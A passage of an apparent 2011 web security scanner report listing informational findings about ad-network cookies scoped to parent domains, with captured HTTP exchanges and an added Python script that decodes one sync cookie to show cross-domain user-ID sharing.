The following cookies were issued by the application and are scoped to a parent of the issuing domain: V, pb_rtb_ev. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=2925993182975414771 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app603
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:56:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.14. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: CMID, CMPS, CMPP, CMS, CMST, CMD1. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025 HTTP/1.1
Host: c.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSC=TmLJ3w**; CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMST=TmLJ305iyskD; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyskAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 04 Sep 2011 00:48:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
Set-Cookie: CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
Set-Cookie: CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ck/10105-135615
...[SNIP]...

11.15. http://ce.lijit.com/merge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ljtrtb. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=1&3pid=2925993182975414771 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n48), ms lax-agg-n48 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Mon, 05 Sep 2011 00:58:08 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;
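The report's own advice for this finding is to review the cookie's contents to determine its function, so here is that review carried out on the captured data. This is an added example, not part of the original report or of Lijit's code: it takes the Set-Cookie header and request line of 11.15 as they appear above, and a hand-assembled table of other places in this report where the same identifiers occur. The only decoding assumption is visible in the value itself: "eJy" is the Base64 of the bytes 78 9c, the header of a zlib stream, so the value is URL-encoded Base64 of zlib-compressed data. Reading the pid/3pid pair as a partner id and that partner's user id is an interpretation, not something the page states.

```python
"""Decode the ljtrtb cookie that ce.lijit.com/merge set in finding 11.15
and relate it to the request that produced it. Added example; not code
from the report or from the site under test."""
import base64
import json
import re
import urllib.parse
import zlib

# Copied from the 11.15 request line and Set-Cookie header.
REQUEST_QUERY = "pid=1&3pid=2925993182975414771"
SET_COOKIE = ("ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; "
              "expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com")

# Fragments of other captures in this report (host -> request/response
# snippet), assembled by hand to show where the same identifiers recur.
OBSERVED = {
    "cdn.turn.com": "ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468",
    "ce.lijit.com": "/merge?pid=1&3pid=2925993182975414771",
    "d.audienceiq.com": "/r/dm/mkt/44/mpid//mpuid/2925993182975414771",
    "optimized-by.rubiconproject.com": "put_1185=2925993182975414771",
    "image2.pubmatic.com": "piggybackCookie=pcv:1|uid:2925993182975414771 "
                           "KRTBCOOKIE_57=476-uid:6422714091563403120",
    "ib.adnxs.com": "uuid2=6422714091563403120",
}


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, attributes).

    RFC 6265 section 5.2: the first '=' separates name from value, ';'
    separates attributes, and attribute names are case-insensitive.
    """
    first, *rest = (p.strip() for p in header.split(";"))
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, value, attrs


def decode_ljtrtb(value):
    """URL-decode, Base64-decode and inflate the value; return the parsed JSON."""
    raw = base64.b64decode(urllib.parse.unquote(value))
    if raw[:2] != b"\x78\x9c":
        raise ValueError("not a zlib stream with the default-compression header")
    return json.loads(zlib.decompress(raw).decode("ascii"))


def explain_merge(set_cookie, query):
    """Check whether the cookie simply stores the ids carried in the /merge query."""
    name, value, attrs = parse_set_cookie(set_cookie)
    mapping = decode_ljtrtb(value)
    params = dict(urllib.parse.parse_qsl(query))
    return {
        "cookie": name,
        "domain": attrs.get("domain"),
        "mapping": mapping,
        # Assumption: pid names a partner and 3pid is that partner's user id,
        # i.e. the cookie is a cookie-sync table keyed by partner.
        "stores_request_ids": mapping.get(params["pid"]) == params["3pid"],
    }


def shared_identifiers(observed):
    """Map each 19-digit identifier to the hosts it was seen on, when more than one."""
    seen = {}
    for host, fragment in observed.items():
        for ident in set(re.findall(r"\b\d{19}\b", fragment)):
            seen.setdefault(ident, set()).add(host)
    return {ident: sorted(hosts) for ident, hosts in seen.items() if len(hosts) > 1}


if __name__ == "__main__":
    print(explain_merge(SET_COOKIE, REQUEST_QUERY))
    for ident, hosts in shared_identifiers(OBSERVED).items():
        print(ident, "->", ", ".join(hosts))
```

The inflated cookie is the JSON object {"1":"2925993182975414771"}: the 3pid from the request stored under the pid key. The same 19-digit value is the uid in the cdn.turn.com referrer, the mpuid path segment at d.audienceiq.com, the put_1185 cookie at rubiconproject.com and the piggybackCookie at pubmatic.com, so the cookie's function is to carry one ad network's user identifier into another network's domain. That is why the finding is informational: nothing in it authenticates a session, but it is a durable cross-domain tracking key.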

11.16. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

11.17. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.18. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.19. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.20. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.21. http://i.casalemedia.com/imp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /imp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp.gif?c=89733&cr=235451 HTTP/1.1
Host: i.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=102679&1315097055; CMST=TmLJ305iyd8B; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT

GIF89a.............!.......,...........D..;

11.22. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120
Date: Sun, 04 Sep 2011 00:57:20 GMT
Content-Length: 0


11.23. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2925993182975414771 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; PUBRETARGET=78_1409703834

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


11.24. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 295

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' heigh
...[SNIP]...

11.25. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
